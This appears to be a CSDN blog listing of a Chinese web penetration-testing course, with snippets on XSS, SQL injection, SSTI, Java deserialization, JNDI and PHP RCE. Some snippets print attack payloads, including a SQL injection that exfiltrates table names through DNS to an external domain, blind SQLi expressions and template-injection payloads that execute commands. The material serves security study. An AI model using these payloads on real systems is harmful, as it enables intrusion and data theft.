独孤求败Ace-优快云博客

原创第60天：Web攻防-XSS跨站&文件类型&功能逻辑&SVG&PDF&SWF&PMessage&LocalStorage

挖掘到该漏洞的关键在于：目标站点的html文件里面有没有Message事件监听->如果有，就可以构造html攻击文件，用postmessage去控制目标文件中的${event.data.url}参数，从而触发xss。其实就是将有恶意js代码的各类文件（swf,pdf,svg,html.xml等）上传->访问该文件->让浏览器解析执行其中的恶意代码->触发xss->其实作用不大（水漏洞）=>①自己制作有触发xss漏洞js代码的swf文件->再文件上传swf文件->利用可控参数可以做xss漏洞。

2025-03-20 22:08:50 1130

原创第59天：Web攻防-XSS跨站&反射型&存储型&DOM型&接受输出&JS执行&标签操作&SRC复盘

>例如留言板：在留言板发言后，语句会一直显示在留言板，说明语句被存储进了数据库->如果留言是恶意语句，那么恶意语句也会存在数据库->如果这时用户访问该页面->无论是谁，无论什么时候访问，都会触发该恶意语句。的操作）->如果高手发现了这个大马里面的后面，要进行反制->可以弄一个XSS->一旦这个某人进行查看，XSS被触发（成功反打）攻击利用：XSS漏洞利用构造js语句->实现盲打，COOKIE盗取，凭据窃取，页面劫持，网络钓鱼，权限维持等。基础类型：反射(非持续)，存储(持续)，DOM-BASE。

2025-03-18 21:34:01 1137

原创第58天：Web攻防-SQL注入&二次攻击&堆叠执行&SQLMAP&Tamper编写&指纹修改&分析调试

而用这种-r 1.txt的方式，sqlmap在自动化的时候，只会改掉该文件中测试点的值，数据包的其他内容都固定不会变；#随机user-agent->通bp抓包可以发现sqlmap注入时，数据包的UA头为sqlmap，有明显的sqlmap特征，容易被流量设备监控到，使用该随机user-agent，可以避免这个问题。->目的在于知道sqlmap是怎样注入的，可以进行调试->抓包分析，可以看是不是有注入点，但是sqlmap跑的不对，搞错了，就可以burpsuite手工调试。”来看是不是有堆叠注入。

2025-03-17 21:15:52 1018

原创第57天：Web攻防-SQL注入&高权限判定&跨库查询&文件读写&DNS带外&SecurePriv开关绕过

查表名2：' union select load_file(concat("\\\\",(select table_name from information_schema.tables where table_schema='news_management' limit 0,2 ),".yjjoxijrhw.yutu.eu.org\\xxx.txt")),2,3#（根据root用户权限，可以查到所以的数据库名，再根据对应的数据库名去查里面的表与列）然而，出于安全考虑，MySQL服务器对。

2025-03-16 16:16:54 968

原创第56天：Web攻防-SQL注入&增删改查&盲注&延时&布尔&报错&有无回显&错误处理&审计复盘

or if(ord(substr(database(),2,1))=107,sleep(1),0)->判断数据库第二位ascii码是否等于107。or if(ord(left(database(),1))=107,sleep(1),0) ->判断数据库第一位ascii码是否等于107。left(database(),1)，database() #left(a,b)从左侧截取a的前b位。length(database())=8 #判断数据库database()名的长度。

2025-03-12 22:05:06 904

原创第55天：Web攻防-SQL注入&增删改查&HTTP头&UA&XFF&Referer&Cookie&无回显报错&复盘

>判断是那种浏览器或是手机还是电脑->显示对应适配的界面->如果判断匹配浏览器对应的显示界面->是通过带入到数据库中查询来进行匹配的->则可能存在注入->这里涉及的是查询匹配->访问网站遇到403，可能是因为做了ip地址限制（可以尝试xff绕过),也有可能是做了来源限制（可以尝试referer绕过)，也可能是UA头的原因等->这些都可以成为测试点。获取数据库名->表名->列名->数据（一般是关键数据，如管理员）场景1：限制IP访问功能->涉及数据库查询ip->如。4、数据库查询方法（增加删除修改更新）

2025-03-12 20:30:56 553

原创第54天：Web攻防-SQL注入&数据类型&参数格式&JSON&XML&编码加密&符号闭合&复盘报告

在应用中，存在参数值为数字，字符时，符号的介入，另外搜索功能通配符的再次介入，另外传输数据可由最基本的对应赋值传递改为更加智能的XML或JSON格式传递，部分保证更安全的情况还会采用编码或加密形式传递数据，给于安全测试过程中更大的挑战和难度。借助自带的information_schema.columns表（记录所有数据库名下的表名对应的列名信息）获取数据库名->表名->列名->数据（一般是关键数据，如管理员）2、Web攻防-SQL注入-XML&JSON&BASE64等。SRC报告-众测下的SQL注入挖掘。

2025-03-10 21:28:48 1084

原创第53天：Web攻防-SQL注入&数据库类型&用户权限&架构分层&符号干扰&利用过程&发现思路

3、数据库敏感函数，默认端口及应用。6、有无数据处理（无回显逻辑等）->可以从“延时注入”的角度测试。获取数据库名->表名->列名->数据（一般是关键数据，如管理员）1、判断数据库类型->不同的数据库类型，有不同的sql测试语句。1、Web攻防-SQL注入-产生原理&应用因素。2、Web攻防-SQL注入-各类数据库类型利用。4、数据库查询方法（增加删除修改更新）2、自带数据库，数据库用户及权限。1、数据库名，表名，列名，数据。5、提交数据方式（数据包部分）2、数据操作方法（增删改查）

2025-03-09 17:52:27 1252

原创第53天：Web开发-Python应用&Flask框架&Jinja模版&绑定路由&参数传递&页面解析&SSTI注入

虽然在app.py中可以控制模板目录中index.html文件中的title值，但是这个值在传到index.html。在index.html文件中将title值改成payload，运行后，这个文件才会渲染执行这个payload。②不安全的写法->可控参数的值在传到渲染文件进行渲染后->request.args.get（）->get方式传参。1、安全开发-Python-Flask&Jinja2。2、安全开发-Python-路由传参&SSTI注入。手工payload:参数值被渲染文件->解析执行。

2025-03-06 20:55:03 519

原创第52天：Web开发-JavaEE应用&SpringBoot栈&SnakeYaml反序列化链&JAR&WAR&构建打包

真实情况下，Java网站启动不会向实验的那样使用IDEA来启动，而是使用jar,war包的形式来启动，所以无源码下载泄漏风险，源码泄漏也需反编译（但有时候代码进行了混淆操作，即使反编译jar包成功，也需要强大的逆向能力）jar -cvf yaml-payload.jar -C src/ . //这两条命令的作用和上图一样，都是构建生成yaml-payload.jar文件用的。项目相关配置（了解即可）：项目结构-工件-添加-yaml-payload-添加模块输出-构建工件。

2025-03-04 22:33:33 1144

原创第51天：Web开发-JavaEE应用&SpringBoot栈&身份验证&JWT令牌&Security鉴权&安全绕过

Spring Security安全框架，是Spring Boot底层安全模块默认的技术选型，可以实现强大的Web安全控制。总结：在未知的算法密钥(及jwt加密的sign签名部分）下，即使修改JWT值里的内容去伪造用户，也无法达到认证成功。参考官网：https://spring.io/projects/spring-security。1、如上本身的代码不安全写法，如不安全写法“/admin"->安全写法”/admin/**"1、安全开发-JavaEE-身份验证-JWT&Security。

2025-03-03 22:53:27 746

原创第50天：Web开发-JavaEE应用&SpringBoot栈&Actuator&Swagger&HeapDump&提取自动化

泄漏应用接口：用户登录，信息显示，上传文件等（swagger泄露的接口很多，无法一一测试，需要根据泄露的api接口名字，有针对性的去测试）接口文档是当前前后端分离项目中必不可少的工具，在前后端开发之前，后端要先出接口文档，前端根据接口文档来进行项目的开发，双方开发结束后可。参考：https://blog.youkuaiyun.com/lsqingfeng/article/details/123678701。3.X版本访问路径：http://ip:port/swagger-ui/index.html。

2025-03-02 18:11:37 1249

原创第49天：Web开发-JavaEE应用&SpringBoot栈&模版注入&Thymeleaf&Freemarker&Velocity

os.system("calc.exe")</@value>//@value为自定义标签。__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d__::.x->lang参数。参考：https://mp.weixin.qq.com/s/TtNxfSYsB4HMEpW_OBniew。

2025-03-01 21:52:56 559

原创第48天：Web开发-JavaEE应用&依赖项&Log4j日志&Shiro验证&FastJson数据&XStream格式

>造成我们白盒/黑盒发现了该Java代码使用xstream组件，也知道该组件的版本，并从网上找到了该版本xstream的payload->但是payloa执行不成功->分析：很有可能是jkd版本不对（该paoload里面有JNDI注入，该注入受jdk版本限制）打开一个网页，看到有上传参数的点，无脑上传log4j的payload，因为不知道代码，也不知道是哪里接受恶意参数，只能无脑上传来测试。参考：https://mp.weixin.qq.com/s/M_oQyZYQEFu0nbG-IpJt_A。

2025-02-25 22:54:44 906 1

原创第47天：Web开发-JavaEE应用&JNDI注入&RMI服务&LDAP服务&DNS服务&高版本限制绕过

增加了com.sun.jndi.rmi.object.trustURLCodebase选项，默认为false，禁止RMI和CORBA协议使用远程codebase的选项，因此RMI和CORBA在以上的JDK版本上已经无法触发该漏洞，但依然可以通过指定URI为LDAP协议来进行JNDI注入攻击。增加了com.sun.jndi.ldap.object.trustURLCodebase选项，默认为false，禁止LDAP协议使用远程codebase的选项，把LDAP协议的攻击途径也给禁了。

2025-02-23 22:09:02 928

原创第46天：Web开发-JavaEE应用&原生和FastJson反序列化&URLDNS链&JDBC链&Gadget手搓

1、核心：java.util.HashMap实现了Serializable接口满足条件后，通过HashMap里面的hash到key.hashCode()，key的转变URL类，再到hashCode为-1触发URLStreamHandler.hashCode。例如将json转换成一个类。\":\"rmi://xx.xx.xx.xx/xxxx\", "《=》this.getDataSourceName()触发以下注入。\":\"rmi://xx.xx.xx.xx/xxxx\", " + //改动的成员变量。

2025-02-23 17:30:20 1262

原创第45天：Web开发-JavaEE应用&动态接口代理&原生反序列化&危险Invoke&重写方法&利用链

其特征是代理类与委托类有同样的接口，代理类主要负责为委托类预处理消息、过滤消息、把消息转发给委托类，以及事后处理消息等。能够实现数据的持久化，通过序列化可以把数据永久的保存在硬盘上，也可以理解为通过序列化将数据保存在文件中。上图查看是否反序列化的安全问题，更多是从代码的角度去发现的，实战中没有代码->所以实战中更多的是去。上图查看是否反序列化的安全问题，更多是从代码的角度去发现的，实战中没有代码->所以实战中更多的是。(3) 入口类参数包含可控类，该类又调用其他有危险方法类，readObject调用。

2025-02-20 23:20:14 652

原创第44天：Web开发-JavaEE应用&反射机制&类加载器&利用链&成员变量&构造方法&抽象方法

其实从官方定义中就能找到其存在的价值，在运行时获得程序或程序集中每一个类型的成员和成员的信息，从而动态的创建、修改、调用、获取其属性，而不需要事先知道运行的对象是谁。a、搞清楚java反射技术中的获取class类对象、获取成员变量、获取成员方法、获取构造方法的操作以及invoke->操作时:都是以获取class类对象为开始。参考：https://blog.youkuaiyun.com/cxy2002cxy/article/details/144809310。//先获取单个公共成员变量“name"->”field“

2025-02-19 21:51:00 1218 1

原创反射就是看计算机室

其实从官方定义中就能找到其存在的价值，在运行时获得程序或程序集中每一个类型的成员和成员的信息，从而动态的创建、修改、调用、获取其属性，而不需要事先知道运行的对象是谁。//4、通过类加载器获得Class对象：//ClassLoader.getSystemClassLoader().loadClass("全路径类名");参考：https://blog.youkuaiyun.com/cxy2002cxy/article/details/144809310。参考：https://xz.aliyun.com/t/9117。

2025-02-18 08:37:03 584

原创第42天：Web开发-JavaEE应用&Servlet技术&路由配置&生命周期&过滤器Filter&监听器Listen

Filter被称为过滤器，过滤器实际上就是对Web资源进行拦截，做一些处理后再交给下一个过滤器或Servlet处理，通常都是用来拦截request进行处理的，也可以对返回的 response进行拦截处理。开发人员利用filter技术，是运行在Web服务器或应用服务器上的程序,它是作为来自Web浏览器或其他HTTP客户端的请求和HTTP服务器上的数据库或应用程序之间的。生命周期：先执行init()->service方法（doget,dopost,doput)->destroy（）

2025-02-16 17:47:46 579

原创第41天：Web开发-JS应用&微信小程序&源码架构&编译预览&逆向调试&嵌套资产&代码审计

案例1：小程序中嵌套Web应用资产 ->作用：对小程序抓包测试时->可以抓到网站信息->将小程序测试转向web测试。https://mp.weixin.qq.com/s/z28ppqhNJnLVWSScMEqiuw->价值高。4、代码逻辑安全（算法，提交接口等）->有些地方有加密算法->在测试时找到加密逻辑->进行算法还原也很重要。案例2：嵌套第三方云服务如OSS ->作用：对小程序反编译后->代码审计发现敏感信息AK、SK。1、逆向反编译->获取源码->代码审计->信息泄露&url&接口等。

2025-02-11 21:59:31 1653

原创第40天:Web开发-JS应用&VueJS框架&Vite构建&启动打包&渲染XSS&源码泄露&代码审计

vite打包器（vue框架中的打包，效果和webpack相似），如果配置不但，如开发，生产模式配置不当，devtool配置不当，都会造成源码泄露或map映射文件泄露。②前端F12->翻各种文件，尤其是js文件，找是否有泄露的账密，接口、url,接口可抓包（构造文件上传等）->构造文件上传还需学习（这一招很实用，也很看运气）->不会产生xss,它会将<script>alert(）恶意语句中的"<",实体化成<，使恶意语句失效。->产生xss,使恶意语句生效->因此该关键词成为vue框架代码审计的关注点。

2025-02-10 21:50:21 1070 1

原创第39天：Web开发-JS应用&WebPack构建&打包Mode&映射DevTool&源码泄漏&识别还原

，如果将参数devtool配置为“source-map”、“cheap-source-map”、“hidden-source-map”、“nosources-source-map”、“cheap-module-source-map”等值时，打包后将生成单独的。这样，初次加载时，浏览器只会加载最小的必需代码，而不是所有的代码，从而提高页面加载速度。Tree Shaking：Webpack 能够识别并删除未使用的代码，这样在最终打包时只会包含必要的代码，减少最终打包文件的体积。

2025-02-09 17:15:35 1206

原创第38天：Web开发-JS应用&NodeJS&原型链污染&文件系统&Express模块&数据库通讯&审计

参考：https://f1veseven.github.io/2022/04/03/ctf-nodejs-zhi-yi-xie-xiao-zhi-shi/，不需要apache，只需安装、配置nodeJS中相应的库，就能解析代码，从而显示网站页面；在这里浏览器发挥的作用就变小了；部署：https://hellosean1025.github.io/yapi/devops/index.html。审计参考:https://mp.weixin.qq.com/s/mKOlTQclji-oEB5x_bMEMg。

2025-01-19 11:31:28 1098

原创第34天：Web开发-PHP应用&鉴别修复&AI算法&流量检测&PHP.INI&通用过滤&内置函数

WAF或流量监控（通过设置检测规则，黑名单白名单进行过滤））->数据会先到WAF（也就是此处的python脚本）->先检测一遍->如果数据正常->再传输到中间件平台（如apache)->再到服务器进行代码数据处理。6、mysql_real_escape_string()调用mysql库的函数在以下字符前添加反斜杠:x00、\n、\r、\、x1a。可识别类似C语言的\n，r，…检测：数据的类型差异，数据的固定内容->针对类型和固定数据内容进行过滤->缺点在于过滤单一、有限->麻烦。

2025-01-17 20:51:35 1407

原创第37天：Web开发-JS应用&原生代码&前端数据加密&CryptoJS库&代码混淆&Obfuscator库

script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"></script>->远程调用crypto库。<script src="crypto-js.js"></script>->本地调用crypto库。项目：https://github.com/brix/crypto-js。>客户端发送->密文数据传输->服务端接受数据->解密数据->处理数据。1、安全开发-原生JS-数据加密&代码混淆。

2025-01-17 20:00:50 676

原创第36天：Web开发-JS应用&原生代码&BOM浏览器对象&DOM文档树&XSS重定向&安全实例

参考：https://mp.weixin.qq.com/s/iUlMYdBiOrI8L6Gg2ueqLg。添加、删除、移动或替换元素（这里的元素也就是html中的各种标签）参考https://xz.aliyun.com/t/12499。窗口的screen属性包含有关客户端显示屏的信息。指文档对象，既属于BOM对象，也属于DOM对象。1、安全开发-原生JS-DOM树&BOM对象。2、安全开发-原生JS-DOM安全&安全案例。Location对象包含有关当前URL的信息。指浏览器对象，包含浏览器的信息。

2025-01-15 23:31:38 594

原创第35天：Web开发-JS应用&原生代码&Ajax技术&JQuery库&Axios库&前端校验&安全结合

对浏览器事件做出响应，读写HTML元素，2、后台发送：浏览器的请求是后台js发送给服务器的，js会创建单独的线程发送异步请求，这个线程不会影响浏览器的线程运行。->php后端代码进行数据校验->返回特定的校验值->js代码接收返回包的校验值->进行比较判断->实现登录。使用JS可以使得网站运行高效、简洁，减轻服务器的运行负担，追求网站运行的速度与效率；①js过滤代码->由于嵌入在页面html中->所以能被攻击者能看到->从而。①js过滤代码->由于嵌入在页面html中->所以能被攻击者能看到->从而。

2025-01-13 23:30:00 1373

原创第33天：Web开发-PHP应用&代码执行&命令注入&RCE安全&数据解析&引发函数&CVE审计

PHP 提供代码执行 (Code Execution) 类函数主要是为了方便研发人员处理各类数据，然而当研发人员不能合理使用这类函数时或使用时未考虑安全风险，则很容易被攻击者利用执行远程恶意的PHP代码，威胁到系统的安全。：路由器固件->二进制逆向->web相关的源码->代码审计->发现命令执行漏洞->构造POC验证。php代码执行函数->找到该函数的可控变量->可控变量传参数->参数为恶意代码->恶意代码执行。->判断可能存在什么类型的漏洞->有的可以往文件方面去测试&有的可以从命令执行方面去测试等；

2025-01-12 17:37:10 879

原创第32天：Web开发-PHP应用&文件操作安全&上传下载&任意读取删除&目录遍历&文件包含

>任意文件读取/删除/修改/上传/下载等漏洞存在的原因->本质上是存在“可控变量”来传递参数->如果过滤不严->这些可控变量原则上可通过../等方式绕过->从而导致可控变量可以是任意目录位置的文件->造成漏洞。$_FILES["表单值"]["tmp_name"] 获取上传的临时副本文件名。$_FILES["表单值"]["type"] 获取上传文件MIME类型。$_FILES["表单值"]["size"] 获取上传文件字节单位大小。$_FILES["表单值"]["name"] 获取上传文件原始名称。

2025-01-11 11:38:08 1535

原创第31天：Web开发-PHP应用&TP框架&MVC模型&路由访问&模版渲染&安全写法&版本漏洞

高度可定制的文件上传库，支持图片预览、验证、上传进度等，适合需要精美上传功能的Web项目。高度可定制的富文本编辑器，支持图片、文件上传、富文本格式化等功能，广泛用于Web项目中。轻量级、现代的富文本编辑器，支持图像处理、视频嵌入、内嵌富文本等，适合复杂的Web应用。开源富文本编辑器，功能强大、轻量级，支持图片、视频、格式设置等功能，适合单页面应用。支持多种文件上传方式的组件，支持多文件上传、拖拽上传，支持PHP处理后台。现代的富文本编辑器，功能丰富，支持图片、文件上传等，适合多种Web应用。

2025-01-07 21:44:28 1668

原创第30天：Web开发-PHP应用&组件框架&前端模版渲染&三方插件&富文本编辑器&CVE审计

POC:{otcms:$smarty.template_object->smarty->_getSmartyObj()->display('string:{otcms:system(calc)}')}->此漏洞有些鸡肋，需要先admin登录进去，才可以修改模板，从而执行POC命令。高度可定制的文件上传库，支持图片预览、验证、上传进度等，适合需要精美上传功能的Web项目。轻量级、现代的富文本编辑器，支持图像处理、视频嵌入、内嵌富文本等，适合复杂的Web应用。

2025-01-06 14:16:40 1419

原创第29天：Web开发-PHP应用&弱类型脆弱&Hash加密&Bool类型&Array数组&函数转换比较

即MD5（QNKCDZO）==MD5（240610708）进行“==”若比较时，返回的结果会为真，” ，这个是强比较，先比较类型，再比较数值；不过也不是代表无从下手，也是存在绕过的可能性的，在。当使用in_array()或array_search()函数时，如果。，如果两个值的类型不相等就会把两个值的类型转为同一类型进行对比。，则in_array()或array_search()将使用。低版本php的strcmp（）函数比较的是字符串类型，1、安全开发-原生PHP-弱类型脆弱。

2025-01-05 12:41:21 763

原创第28天：Web开发-PHP应用&Cookie脆弱&Session固定&Token唯一&身份验证&数据库通讯

(内置token生成，每访问一次，token值就会在服务端的session中变动）loginst.php->（先验证token，再验证账号密码）logincheck.php->（验证session）indexst.php->（退出登录，消除服务端生成的session\Token值）loginst_out.php。而不采用token机制的Web应用程序，一般会在服务器上存储用户的登录状态，因此如果服务器被黑客攻击，黑客可能会获得用户的敏感信息。Cookie一般用于存储小型的数据，如用户的用户名和密码等信息。

2025-01-04 17:41:37 964

原创第27天：Web开发-PHP应用&原生语法&全局变量&数据接受&身份验证&变量覆盖&任意上传

参考：https://blog.youkuaiyun.com/qq_59023242/article/details/135080259。找变量覆盖代码->找此文件调用->选择利用覆盖Session->找开启Session文件覆盖。参考：https://zhuanlan.zhihu.com/p/718742254。：广泛用于收集提交method="post" 的HTML表单后的表单数据。找文件上传代码->找此文件调用->找函数调用->过滤type用mime绕过。$_ENV：是一个包含服务器端环境变量的数组。

2025-01-02 20:00:49 661

原创第25天：信息收集-项目系统&一键打点&资产侦察&企查产权&空间引擎&风险监测&利器部署

Nemo是用来进行自动化信息收集的一个简单平台，通过集成常用的信息收集工具和技术，实现对内网及互联网资产信息的自动收集，提高隐患排查和渗透测试的工作效率，用Golang完全重构了原Python版本。项目地址2：https://github.com/ki9mu/ARL-plus-docker。集成Fofa、Hunter、Quake、Zoomeye、Shodan、censys、VT、项目地址1：https://github.com/adysec/ARL（升级版）2、信息收集-项目推荐-自动化资产收集管理。

2024-12-30 22:09:21 1417

空空如也

kali显示no x11 display variable was set;

kali运行应用程序无法使用图形化界面

kali应用程序打不开图形化界面

网络安全PHP study，burp suite抓包，RCE漏洞

scrapy框架，python爬虫

redis数据库，scrapy,爬虫

scrapy框架，爬虫，中间件

scrapy框架，命令提示符，python爬虫

pycharm爬虫预览html显示not found

一个简易的爬虫网页采集，无法运行，保存HTML文件

代码已对齐，仍出现IndentationError: unindent does not match any outer indentation level